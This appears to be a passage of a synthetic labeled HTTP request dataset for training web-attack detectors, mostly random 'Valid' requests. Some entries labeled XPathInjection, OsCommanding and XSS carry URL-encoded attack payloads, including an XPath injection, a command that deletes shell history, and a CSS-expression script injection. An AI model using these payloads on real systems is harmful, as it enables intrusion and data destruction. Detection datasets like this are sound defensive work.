Cookie: depasewniovkl=53;eecdonlirc=wxi-nYax1;dsnEsg6lbi779o=0080381
Cookie2: $Version="81"
Date: Wed, 06 Jan 10 20:46:15 GMT
ETag: "I6x001IZy.Iz5lBYh"
Expect: 1tru4e0e=nmgodha;Hlme=rptcyece
From: ogpe@eKhmc.uk
If-Modified-Since: Fri, 09 Dec 05 02:21:53 GMT
If-Unmodified-Since: Tue, 17 Jan 06 08:13:33 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Feb 07 02:24:12 CET
Max-Forwards: 516
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: NTLM ZXQwYWFlY284ZXRuaGFJYW5vZW8wb3NoYTA5bm5heXVkbnJld2c=
Range: 5-9725,-6683
Referer: http://tts8kbln.fr/noee3o1s/tzdeiei.tiff
TE: gzip,trailers
Trailer: If-Range
User-Agent: aheap (gGwsSCuY)
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 272x2054
Via: HTTP/7.3 32.210.60.18
Transfer-Encoding: compress
Upgrade: 8gtyn/7.7, ttdrko/9.1, 7yofs/9.0
Warning: 175 www.eSis7tea.tiff:885 "oeto0awd6ika" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39259
Start - Id: 49947
class: XPathInjection
GET /TeyosoetiqiT/hL/afeoLfSOd/ssecua6oaHdrooe/tT/8nd7toitIhuce2y/eo/jtgufr4/f7cF2oVXgMCUu/HtH@gtLEfRl.jpeg?ei=2645&6ea1eeoyqoao=af4&mQe7lhaoa=yffbt5%27++++or+count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28++++i++++%2B+++j+++%2Bk%2B+++l+++%2B+1%29%5D++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++++%273meed%27+%3D+%27+++++yo%27+++or&PuNvO4Hj0d=wPettheoMfsdn HTTP/1.1
Host: 201.122.73.232
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw;q=0.4, iso-8859-7;q=0.4, x-mac-ce
Accept-Encoding: *;q=0.5
Accept-Language: aiOrdLp-HnsA, acOUr-sstnhr;q=0.2, tdaoozeg-soie6lr;q=0.0, CPTobd-iBn7
Cache-Control: min-fresh=00
Client-ip: 6.57.199.123
Cookie: sfadtjtrnwninn=s ;hwcr=areox;hortk=3;ubVGjfgu=]asl ia;uyiii7o=3;cqrtimyymittenI=nNiCD
Cookie2: $Version="9"
Date: Thu, 27 Jan 05 11:02:54 UTC
ETag: "lxemiDvLWMw9dQLdPP"
Expect: 100-continue
From: thnep@gnfilnelrR.biz
If-Modified-Since: Mon, 09 Jan 06 22:20:05 UTC
If-Unmodified-Since: Fri, 05 Jun 09 10:28:12 GMT
If-Match: *
If-None-Match: *
If-Range: "NgzO6o.LlAaZ_cOUp1"
Max-Forwards: 2623
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM ZWNuN2NibnJlbjJqZ253bWVlcnRXZmRvc2xvdmxubGllY2FyZWl3ZXBOd2w=
Authorization: evwOlt lsy3mt=9sciu
Range: 33-0
Referer: http://ilZCizuW.ch/gtaSSdu/niioz0r/dds7r3m/Rl4een/iqehi.tiff
TE: trailers
Trailer: Expect
User-Agent: 3ioagie (z-MfM1KNp; rckY5.s; lntyx@I; djg-.PdH; a@7_WM)
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 299x2707
Via: FTP/9.3 www.9goxeoae.tiff
Transfer-Encoding: compress
Upgrade: d4T/6.8, oecM/8.1, tgey/1.2, v4dyl/2.5
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49947
Start - Id: 21075
class: Valid
GET /loah5abrheeNmin/p3f-AOP_uVX/f7tgeo/wntU4s2lbelRieuin8n/usAbcmd9BtQVINVl_/Z@7f6@XPP6dEe.msf?edyAesebloTtqra=1sr+%3EIfebHsxt&wnrthAo=%3D8o9sssuscripttaeadr%24s%3Ats&P3VhQJCi=iae HTTP/1.1
Host: www.eNnymixi.be
Connection: keep-alive
Accept: image/*, text/*;q=0.8
Accept-Charset: koi8;q=0.1
Accept-Encoding: identity;q=0.7
Accept-Language: c0-t6s;q=0.8, khqeem0e-Se, 4igvatmn-uucaif;q=0.6, vyiIlm-0tweat
Cache-Control: no-store
Client-ip: 238.193.48.102
Cookie: sn=lo/pradZtalwjimehrU;ctoozh=zt0)i7g~5sa7;abqdeaetvnogt=797NA_bd2nhz;sykobsovIeti=1811
Cookie2: $Version="476"
Date: Mon, 07 Sep 09 17:13:16 CET
ETag: "9IxDM2DgpMQu2_MI4@"
Expect: 100-continue
From: TcuGd@oto9w.com
If-Modified-Since: Wed, 03 Jan 07 03:50:13 GMT
If-Unmodified-Since: Mon, 20 Jul 09 14:59:07 GMT
If-Match: "QPi7aJXcwROyYcbmO"
If-None-Match: *
If-Range: *
Max-Forwards: 32
MIME-Version: 9.2
Pragma: dAi9l=2t
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest opaque="fo6npbr6"
Range: 966923-49277,-9,672714-
Referer: /quene/17Seae58/otcIst.html
TE: trailers,chunked;q=0.9
Trailer: TE
User-Agent: anadei
UA-CPU: 68000
UA-Disp: 708,2630,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 523x776
Via: eseuo/4.5 www.tc8o.tiff, 3.2 www.iBOcste.htm, 8.0 146.58.150.224:255
Transfer-Encoding: deflate
Upgrade: 7ynff/7.0
Warning: 713 12.247.43.52:5198 "etwniheaEussemp7n" "Tue, 07 Sep 04 10:12:42 UTC"
X-Forwarded-For: 204.19.242.253
X-Serial-Number: 650978480578430420
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21075
Start - Id: 24704
class: Valid
GET /dsGg2ttrtNyfa/hQlZYU0nEU/tirweehe7/ddRr.L8bIW8NU1GN.png?PxmlSTc=e55FZ46&trq=Tusrdlibr&dsoyej=65&cagrzeryAienz=l%26&ehinnr=lsborsdta3&2pteitsx=O&ljesb1eenenrpoo=lvMwSuykN&end7he=s&uehucoaxRc=53507238&naeasacf=cF7xD&rre=tZfrD HTTP/1.0
Host: www.trdaSdhirs.de
Connection: hidSbyEl
Accept: */*
Accept-Charset: utf-8, iso-8859-2
Accept-Encoding: *
Accept-Language: HtYieas-segai;q=0.4
Cache-Control: D0m='mstrOc'
Client-ip: 134.9.21.40
Cookie: cierCtcsSrhe=sidghd4toaY4trtmlf;ewpnt4ot7woo=1;onaiid=thaRoro6hmfntk;legnnf=fmo9urWPCAvi
Cookie2: $Version="077"
Date: Sun, 28 Oct 07 08:11:44 GMT
ETag: "t@IVI2TA3htbcl8FxPh"
Expect: 100-continue
From: e0as@ptste.uk
If-Modified-Since: Thu, 17 Aug 06 23:22:58 CET
If-Unmodified-Since: Mon, 16 Jan 06 23:05:34 CET
If-Match: "Xb-OSa4csVhv5.5"
If-None-Match: *
If-Range: Fri, 09 Jul 04 14:22:43 CET
Max-Forwards: 63
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: Digest username="seensbse"
Range: 1773-,147343-45947,-7279
Referer: /O7p2eui/aA0cn2/neyIhdpo/pioohoL/uSaOg19.cgi
TE: gzip
Trailer: Date
User-Agent: Mozilla/3.5 (Windows; U; Win98 3.5; nB-Wt; rv:0.4.7) Gecko/70834440
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 189x0213
Via: HTTP/5.0 www.ayncp.png, 6.5 248.169.75.45, rmweu/2.4 www.diaatn.png:29
Transfer-Encoding: l9uth; w0net=6mu7mea7
Upgrade: noohwb/5.0
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 7759023411175915
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24704
Start - Id: 8768
class: Valid
GET /m2il/iPeEgoA8@v/4@uoXd1FZP6.6bL/T5lPCpskp/r0uB.a/Q37eph@0olsIAV/edG4jfz.3uolps.jpeg? HTTP/1.1
Host: www.iibea.ch
Connection: keep-alive
Accept: text/*;q=0.4, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i-tda9hE;q=0.8, te1enj1-hforts, InIt-6, o2niatI-hDnum;q=0.6
Cache-Control: a4stoe=nb0deal
Client-ip: 128.243.225.249
Cookie: F7processing-instructionkconnect=DTuta46$iGJhn1;WfkdrjatfV9f=58;tdosmcLtcIz=a7PKSFs;knrohldOmfp=aandeq;SrTdocumentysamDERlink=6C-DZtF5;lhx1Otivafds=e0uY
Cookie2: $Version="149"
Date: Tue, 13 Nov 07 06:02:14 GMT
ETag: W/"mN-q7y62RCi4Ex1"
Expect: 100-continue
From: xrVtdi5@b55e.cz
If-Modified-Since: Thu, 10 Mar 05 11:34:50 CET
If-Unmodified-Since: Fri, 12 Feb 10 10:31:52 CET
If-Match: *
If-None-Match: *
If-Range: "N_4jnFXLIxVhJkxdlv3"
Max-Forwards: 217
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic OWVxbjplZUJBaA==
Authorization: Basic R2ltZDpndHRh
Range: -914608,-7
Referer: /iasea.jpg
TE: trailers,gzip;q=0.3,trailers
Trailer: Trailer
User-Agent: Mozilla/8.5 (Windows; U; WinNT 4.8; 4t-dt; rv:3.0.0) Gecko/81249025
UA-CPU: Sparc
UA-Disp: 608,0739,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3952x6692
Via: FTP/2.5 239.26.144.64, 9.8 www.sE4eea.jpg
Transfer-Encoding: deflate
Upgrade: r0eEiT/8.6, htI/9.8, ege/8.8, H6lSS/0.3, hdcioa/7.8
Warning: 642 69.235.0.195:2770 "RaqtwI1" "Tue, 27 Jul 04 11:32:37 GMT"
X-Forwarded-For: 71.221.125.93
X-Serial-Number: 28573562
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8768
Start - Id: 27286
class: Valid
GET /tgM5tHd0tx0ni2o/uoX3eD/r.03xsMtR.iN.nsf?vru8hai6iSui0=ecianrehuaanfto7d9&emn4bmaungb=m-I&tsehOm=n%3E%2Fe7&t5hrnot=%7C-b%27system%2Bssformscriptxtermmail%3De&PbQallbkN=ausBz6 HTTP/1.0
Host: 243.34.129.53
Connection: ltalhl8
Accept: application/*, text/html;q=0.7, audio/*
Accept-Charset: windows-1251;q=0.6
Accept-Encoding: 
Accept-Language: emr-tseyaio;q=0.3, uena-psn;q=0.0, meiaA-Ne, t-addbyetn;q=0.6, hceb-aec
Cache-Control: no-transform
Client-ip: 178.54.145.217
Cookie: rnsi0zedsyMe=71;ahb=lQf1V;0processing-instruction4HuU=ahXsrOwnc;sAsjorhli=hainuo;eMtt1nbajsl4zho=I
Cookie2: $Version="874"
Date: Mon, 29 Aug 05 17:40:47 GMT
ETag: W/"dZdeLIIail_Zlt0UZ"
Expect: SrRtriaD
From: Dt21hm@sbe22sjbhs.com
If-Modified-Since: Sun, 27 Sep 09 02:42:37 UTC
If-Unmodified-Since: Thu, 14 Jun 07 07:06:31 GMT
If-Match: "o..zbaSPInGvSN7Mc1"
If-None-Match: *
If-Range: "BQVQ9RC8_vK1rw1oIKh"
Max-Forwards: 6890
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM dG1ucmlod2lyY3R0dHlvaGtldG5oc2xzdWRoN1h4bmV5Tm9laGVpZGdk
Authorization: Digest username="4arjfzEs"
Range: 392-,66898-,-0761
Referer: http://www.mcdfekr.com/egigdLsn/bahot6/fOHeje.js
TE: trailers
Trailer: Upgrade
User-Agent: 1reihQa7tetw
UA-CPU: 68000
UA-Disp: 4717,242,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6912x6352
Via: 9.5 57.13.234.143, 2.4 www.iat2o.gif:9435, HTTP/9.4 www.liea.jpg
Transfer-Encoding: gzip
Upgrade: r3yltn/4.8
Warning: 238 180.27.15.55 "t7r8dlbisjtoofgu" "Tue, 07 Feb 06 13:03:45 CET"
X-Forwarded-For: 243.253.89.231
X-Serial-Number: 75164077038098175
----: -----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27286
Start - Id: 7748
class: Valid
POST /ynita9nsg7/eFEooueoi2/eyeueadtnDn1SEs8/vecopyvZN_9k.jpg? HTTP/1.1
Content-Length: 178
Content-Language: auktde,sfotnT
Content-Encoding: compress
Content-Location: http://www.PoOho.cz/eelaya/1S6epo.tiff
Content-MD5: ZG10dGNzeHRoZmF4d2Fjcg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 18 Jan 06 21:09:27 CET
Last-Modified: Sun, 06 Aug 06 14:09:22 CET
Host: 175.29.245.191
Connection: 3nphteau
Accept: text/xml, audio/x-wav;q=0.1
Accept-Charset: *
Accept-Encoding: compress, identity, identity;q=0.6, deflate
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 7.12.86.37
Cookie: 2likepYm=153;XKN4z_hTt=ap-
Cookie2: $Version="8"
Date: Mon, 25 Feb 08 17:07:25 CET
ETag: W/"tJ.mXVTM-c9@qNUQWD"
Expect: 100-continue
From: Issg@FSsymatcdn.biz
If-Modified-Since: Mon, 13 Dec 04 23:06:38 GMT
If-Unmodified-Since: Tue, 15 Aug 06 03:59:11 GMT
If-Match: "Chn3bhy175CMNLS2iK"
If-None-Match: "DYcIxDM2WKU0@gZuzfp"
If-Range: *
Max-Forwards: 525
MIME-Version: 7.3
Pragma: mree='u'
Proxy-Authorization: nlWd 2e8avieh=tri7nwl
Authorization: EnolD ibbep=m4fs0h4
Range: 176685-
Referer: /eEEt7sp.php3
TE: trailers,trailers
Trailer: TE
User-Agent: sfijitoso55raeWdetlt
UA-CPU: PowerPC
UA-Disp: 0857,811,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2784x639
Via: ljrur/6.2 229.158.14.210, 0.0 www.neh5ia.tiff
Transfer-Encoding: eaosso; Ziova=Aeyyisdn
Upgrade: hen/2.3, tkocy/8.4, cNad/2.7, rStxee/8.1
Warning: 810 141.222.234.142 "zmnweaewonEakBetbj" "Sat, 23 Jan 10 20:21:52 CET"
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 755834931599886
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

zslwodsi3er=gv>i &eEiI=z2tatrisd1e&e17ldem52urqg=eg6t&2femn1r=28866871&0t=dhjernRdrhamasqa&fnaanslETembrhp=836&in74sn=0721YZ-&Sjl4Zm=/ nid&osle=0939371608&d5lR=7&iveastxe=6 e

End - Id: 7748
Start - Id: 43133
class: OsCommanding
GET /snX3.cgi?atiecceptlEohob=r%40dN.7wLXj&j2JcEAcL=4&st4scps=documentaccess_logRc%3B&gS8G-gZ71u3=hehhdnshutdowni2tens%22nse&XrWWU1AVKj=svx5bBr6FJh&patieiii=%27+++++%3B+++rm+%7E%2F.bash_history++++%3B&evf9lrfent=lCYFU6JG&leo5avsgadhaanc=Eeetn&6eebhu0aDen3l5f=%3Df&egee=bf&Hjgtisr=9DuyQ&th2dy11oesea=oediadaot HTTP/1.0
Host: 189.66.146.153
Connection: 1imnase
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.8, gzip, identity, compress
Accept-Language: *
Cache-Control: max-age=08
Client-ip: 143.187.208.131
Cookie: n1eecayara=21447
Cookie2: $Version="900"
Date: Thu, 15 Sep 05 02:47:12 GMT
ETag: W/"JwDSIqztA2-pOSIF"
Expect: 100-continue
From: ndud@rzo8frE.cz
If-Modified-Since: Tue, 28 Jun 05 11:26:08 UTC
If-Unmodified-Since: Wed, 30 Jun 04 15:41:33 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 25 Oct 08 16:51:39 UTC
Max-Forwards: 288
MIME-Version: 2.9
Pragma: oors='arhyes'
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: Digest realm
Range: 06-14835,74438-28398,3461-5
Referer: http://dcinr.ch/erbse4/splJt/dasm.png
TE: chunked;q=0.8,chunked;q=0.5,trailers
Trailer: If-Match
User-Agent: ht6d4s (vKQ4JKML; lJ6nIe; nnG5hKq; hJOfpW1R)
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 7.1 www.tieon.shtml, 8.2 208.220.15.166
Transfer-Encoding: compress
Upgrade: arlate/4.9, dxn6g/2.1, pi4tlo/0.5, cgu/2.4
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 209.100.60.54
X-Serial-Number: 231798615796568
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43133
Start - Id: 7628
class: Valid
PUT /lefrshrlrsreh6dtron/boyr/49TR/souwn1mdtsmt6/_Y4qbFsOv2Vechobf/et.js? HTTP/1.0
Content-Length: 233
Content-Language: rM,ea,shogdef
Content-Encoding: compress
Content-Location: http://b3rM1na.ch/ayoajlw/Prii/nlseel.asp
Content-MD5: bWF1cG5seWExdnNyZEFyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Mar 05 05:53:15 UTC
Last-Modified: Thu, 07 Oct 04 08:26:20 CET
Host: 238.244.223.182:8148
Connection: keep-alive
Accept: application/postscript, text/xml
Accept-Charset: x-mac-arabic;q=0.1, koi8;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: a1aoIr=eldeenp
Client-ip: 105.240.119.173
Cookie: itz=lCrcz ;ts2he;etueaxhRIup=7awaK0
Cookie2: $Version="577"
Date: Mon, 26 Nov 07 23:40:36 GMT
ETag: "qi2unb4DKTAP9F9lw"
Expect: Ak8yU=inrte;sean2ch=ymte85R
From: 1mur@1lojso.com
If-Modified-Since: Fri, 23 Jul 04 23:05:22 CET
If-Unmodified-Since: Sun, 22 Jul 07 22:27:28 GMT
If-Match: *
If-None-Match: *
If-Range: "Es1D0sQ.ff5uobNI8"
Max-Forwards: 880
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: ie1iab matdiace=hbdiO
Authorization: NTLM dHNscmVtaW1lYWZncm5paGVpbW5tdm90dW90WGZpaG5u
Range: 70517-,7-,66190-
Referer: /gu4fehs/tTeoSLH/asmsirc.jpg
TE: trailers
Trailer: From
User-Agent: Mozilla/2.3 (X11; U; Open BSD i386 8.0; Le-eq; rv:5.2.0) Gecko/55465013
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color32
Via: 7.7 71.50.109.141:4, HTTP/5.8 www.61h0.tiff
Transfer-Encoding: identity
Upgrade: yyr85/0.6, mnLmta/7.1, sedrw/1.7, wRp3/3.2, ebe/4.8
Warning: 763 www.tBeic.jpeg "daariegtelcya7h" "Tue, 12 Oct 04 10:28:02 CET"
X-Forwarded-For: 223.150.236.173
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

aehk2=opennaaut>lotrdhttpnoden&ant4lhnehstt=44953&YjZechoi=w;os%ua w>de@C?d9a&mteh1sgoyae5ETr=mocha4es&pd52=oyKNKG&Imtersdpeies=64683496&o6nle5sf3nxen=cEtb/9&l8olweEaresoh=igsd2myetcnirnt&ioa=th&SevalKLa=54&tc2ttr=as'

End - Id: 7628
Start - Id: 29313
class: Valid
GET /dfnlYue/tu.jpg?2r6os=nwiOsepmbJ&5TK6JEfaXV8=aeUDU&hscii=25&nneEP=processing-instructionl&tetebhjrsa=oeq9&areGuLtL=oa&6dvbog2skirnn=8fb%2B&mdovel3aoAdee=esj&ec7w4bex=299&gp_ClvXWNnull=7eudyrencsnoefr&_P.BJmKnph-2RW=n5xmlTc&ikhb6E@q8C.=1egsHsenoe5cIinfta HTTP/1.0
Host: www.waenGdaw.com:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-icelandic, x-mac-hebrew, koi8;q=0.8, x-mac-turkish
Accept-Encoding: 
Accept-Language: ycsysH-Espts
Cache-Control: max-age=07
Client-ip: 189.125.66.35
Cookie: 3houoral30sgmte=0hopp;aiheOnl=76782;l.@0=wmaxo98e)Traxeoabody+rcp;La=l sne;KGiRPM=6397;nneOp=97
Cookie2: $Version="22"
Date: Sat, 09 Oct 04 13:48:52 UTC
ETag: W/"MUFUWkhDE0uS4Gk0"
Expect: 3wa2sr=tQnp
From: yttt5iy@rcto.com
If-Modified-Since: Sat, 11 Nov 06 22:17:13 CET
If-Unmodified-Since: Fri, 20 Aug 04 22:32:56 UTC
If-Match: *
If-None-Match: "lP2ER@delzrycAzxc"
If-Range: "PPSeRbc2j7eS0kvYeb"
Max-Forwards: 96
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM aGdmeUVjdG1SZHRpNXRldWVhbm11b2NoN3JuaXRjdXVyZW9l
Authorization: NTLM cmZodENsM25MM2Z0cnd1dGIxbEF0aGJoc21kOHVucmxncXV2dmFhbW5meXRlQW4=
Range: -1680
Referer: http://0htRZ.uk/r6e3etbg/noorselO/sati/psHti.nsf
TE: trailers,chunked;q=0.3,trailers
Trailer: Host
User-Agent: xn4DN55M. http://www.ivHn.com
UA-CPU: StrongARM
UA-Disp: 575,351,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 553x667
Via: HTTP/3.7 www.c0smer.gif:5
Transfer-Encoding: aE4dlt; asdr=bEets
Upgrade: n1tlH/0.1, Iwotm/0.8, 4mr/3.8, entnl/4.8
Warning: 708 www.opmsnet.html "atmareba0" "Wed, 30 May 07 20:29:06 CET"
X-Forwarded-For: 63.57.100.153
X-Serial-Number: 892680378227754
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29313
Start - Id: 46992
class: XSS
GET /zqh6s/HnLpcO.htm?nppt=hatwyNcsaebaa&nor5hizBrtee0e=++shutdownqnvbscript&60mLtinsoittr=homeelR%3Dbeelo7&cvrcnlpLr=raccess_log9is&hie=%3Cdiv++++style++%3D++%22+++++width%3A+expression%28%5Balert%28%27nssoe7h7nM%27%29%3B%5D%29%3B+++%22%3E&eurengtahbt=423&rc=Aitrg HTTP/1.0
Host: www.iat7r.biz
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, deflate;q=0.1, deflate, gzip
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 0.51.121.220
Cookie: Ah3aTE=)ssls3as00oy;clfothn8=e1hoPatcaQ;5itgu=02717
Cookie2: $Version="468"
Date: Sun, 17 Sep 06 15:52:22 UTC
ETag: "f-DBP8aMNHaaIY12Y"
Expect: 3vtn=oa9Wm;sdoo2=dbcNoIu8
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Sun, 22 May 05 19:28:50 CET
If-Unmodified-Since: Tue, 19 May 09 02:30:27 UTC
If-Match: "v7bhnFPjZJoYNz5Ci"
If-None-Match: *
If-Range: "DzDJpdX@FFDYvvts"
Max-Forwards: 4642
MIME-Version: 0.5
Pragma: rlane2i='2'
Proxy-Authorization: Digest username="3iianN2"
Authorization: oiii irge1a=Lktise
Range: 5-22964
Referer: http://itvpt.biz/oAene.doc
TE: trailers
Trailer: Upgrade
User-Agent: oiOhieHt3eplNto1
UA-Disp: 2976,173,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 238x292
Via: 0.7 27.63.43.123, FTP/6.6 136.74.190.220, 0.3 www.essO2.html
Transfer-Encoding: identity
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 352 28.5.137.111:2561 "wEaonerhna" "Mon, 13 Sep 04 13:04:56 UTC"
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46992
Start - Id: 6707
class: Valid
PUT /ZjgE4likekR.wls/D0Y371NwW3htpasshU/lCzVT7faHvFdY/oN4p@F8-5K/cp1eAsUboam1dYNaU/ZrhHF9/gMdSN@zc/DFyp/aKMPkqvKJ@km/sE.jpeg? HTTP/1.1
Content-Length: 59
Content-Language: elv04x,tezjb,hlb
Content-Encoding: gzip
Content-Location: http://lgedathw.fr/agTm/osda7kmo/oEfps/1lae.jsp
Content-MD5: dWE2c29odTluc2dydGdudA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Apr 04 04:43:43 UTC
Last-Modified: Thu, 23 Feb 06 08:49:04 CET
Host: www.etuclRe.com
Connection: keep-alive
Accept: video/*, audio/x-wav;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: iel='6zvni'
Client-ip: 52.136.26.201
Cookie: attT0tstai8nnc=ocinevp;5E=3157;I1Gvfd2SF0Q=7245;uExobawe1canq5=Oo;t9aqinkl=dnCshd8do7w
Cookie2: $Version="8"
Date: Wed, 15 Aug 07 01:06:04 GMT
ETag: W/"CB7UY3Iuxzo9ckHh"
Expect: 100-continue
From: knj5rt@a7eaent9k.cz
If-Modified-Since: Sun, 07 Oct 07 15:12:35 GMT
If-Unmodified-Since: Mon, 09 Oct 06 10:46:33 CET
If-Match: *
If-None-Match: "YFO6cmdxzDLR4hxr"
If-Range: Mon, 01 Jun 09 02:53:33 UTC
Max-Forwards: 6657
MIME-Version: 7.3
Pragma: sstxt='aameisn'
Proxy-Authorization: dsaeS r0s5=eu7h
Authorization: Basic b3NoN246aE9uYmw=
Range: 1-26363
Referer: http://www.eOmf.it/zrhen/choErHn6/tp0tec/3uonzui.jsp
TE: gzip;q=0.0,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 6.2; ei-es; rv:2.2.9) Gecko/22308012
UA-CPU: Sparc
UA-Disp: 035,576,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1839x456
Via: 0.8 www.epmno39m.css, FTP/1.6 www.gruim.shtml
Transfer-Encoding: gzip
Upgrade: hrutt/6.0, tbuzs/0.5, iar/0.3, u7e4ae/3.3
Warning: 930 0.183.140.24 "ddosrtBeth3o6buko01h" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 688311326706532
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

bxgdyDeaohtht=uGyDR&AEN2htpassVl=sifoale&olr=dwYpe&ae=ea5rH

End - Id: 6707
Start - Id: 27393
class: Valid
GET /tAbbr9cF91Jz9jMkFxA/eas0tjnzyoiaMeontdye.swf?oJUM3t=oe6aetna&aura4spiashv8h=523&itmthmz=41354682&httplibPDselect2DHincludesr3=vei&9lswhtgppn=fuec6QKVFZw&ocnoeno=gggN3iGvF8g&ze5c42eatuiC1is=76318211&fe=z%5D%3D%2BEttnizaccess_logusrewls&rsM69ust6r=thnsam&owkuazobbBjai=056257&osiIsh6aooec=15233252&erba=Savp9Sndrop%3B4+6t&ceflctahebswao=4n%40bmM0e2mNL&ewotn05a=a93E%40btHl&atEsneornolh=215889 HTTP/1.0
Host: 36.171.74.177
Connection: Endm9sr
Accept: video/*;q=0.9, text/xml;q=0.9
Accept-Charset: x-mac-arabic;q=0.9, iso-8859-6;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=759
Client-ip: 98.21.57.18
Cookie: cdhIehhSumjiv=3433
Cookie2: $Version="77"
Date: Thu, 28 Jul 05 08:01:14 UTC
ETag: W/"vB7E3Anf@TEEZMA3D.UI"
Expect: tGbh=sapEia;sijpe=vcd1asm
From: glqntj@hA8egh.fr
If-Modified-Since: Fri, 17 Nov 06 09:02:39 CET
If-Unmodified-Since: Sat, 23 Jul 05 06:39:22 GMT
If-Match: "FlX1nJ01MJlfUJlpixq_"
If-None-Match: *
If-Range: *
Max-Forwards: 43
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic ZmFpbXQ6ZXQxU3I=
Authorization: Basic b2NmQW02ZkQ6VG9lbU5hbA==
Range: 70-,295-181022,-8667
Referer: http://www.lrd6se.it/i3Si/0hii.zip
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: Mozilla/4.9 (compatible; MSIE 6.7; Linux i386; oJeyst5r2)
UA-CPU: 68000
UA-Disp: 009,2103,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 9698x542
Via: 2.4 www.nrhto.gif, 8.0 www.eshI.tiff:640
Transfer-Encoding: e65y; ioa9=Gtbdcaim
Upgrade: uroe/2.4, Rrt/3.7
Warning: 680 www.tdeh77g.gif "z1eLBiT0" 
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 012150343166763006
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27393
Start - Id: 19194
class: Valid
